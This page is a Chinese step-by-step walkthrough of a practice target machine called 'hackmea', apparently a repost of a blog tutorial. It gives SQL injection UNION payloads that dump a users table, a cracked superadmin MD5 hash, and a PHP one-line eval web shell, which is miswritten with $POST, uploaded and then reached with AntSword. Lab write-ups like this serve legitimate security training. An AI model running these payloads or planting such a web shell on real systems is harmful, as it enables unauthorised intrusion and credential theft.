当前位置: 首页> 文旅> 旅游 > hackmea靶机(保姆级教程)

hackmea靶机(保姆级教程)

时间:2025/7/13 6:36:45来源:https://blog.csdn.net/2201_75891821/article/details/140778571 浏览次数:0次

一.端口扫描

用工具扫描出他的端口 可以看到我们的端口是192.168.133.165

二.目录扫描

使用dirsearch工具扫描目录

dirsearch -u http://192.168.133.165/

三.漏洞挖掘

我们打开网页的后台管理  点击右下方 注册账号

创建完成后登录你所创建的用户 来到这个页面 单机 search 出现书单

1.验证sql注入

1' and 1=1#

存在SQL注入,使用sqlmap工具注入后面的

2.判断字段

1' order by 3 #

说明字段数是3

3.查看数据库

-1' union select database(),2,3 #

4.查看数据库表名

看到数据库中存在books表和users表;猜测users表包含账户信息

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

5.查看users表所有的列

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users' #

6.查看数据

看到超级用户跟相应密码 可是密码是加密得需要MD5解密

选择superadmin对应的密码          2386acb2cf356944177746fc92523983

使用md5解密 解密后的密码 如下图 

7.登录进去

然后我们去登陆 超级用户

进去可以看到上传文件,在上传一句话木马

<?php @eval ($POST[cmd]);?>

 然后去访问我们传进去的一句话木马的 文件   shell.php

8.最后用蚁剑连接 就成功进去了

好了成功!!拿到shell了 

关键字:hackmea靶机(保姆级教程)

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: